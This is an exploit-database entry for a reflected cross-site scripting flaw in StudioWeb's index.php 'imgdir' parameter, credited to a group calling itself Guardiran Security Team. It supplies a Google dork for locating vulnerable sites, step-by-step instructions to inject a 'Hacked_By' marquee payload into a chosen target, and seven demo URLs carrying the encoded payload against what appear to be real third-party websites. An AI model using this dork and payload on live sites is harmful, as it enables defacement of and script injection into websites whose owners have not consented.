StudioWeb/Cross Site Scripting

2015.11.16
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

######################################################## # Exploit Title: StudioWeb/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by StudioWeb " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://www.studioweb.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://assalamherbal222X.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://susu-bubuk.comX/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://bestbeachbungXalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.ptskk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.goholidayX-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalboXhemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top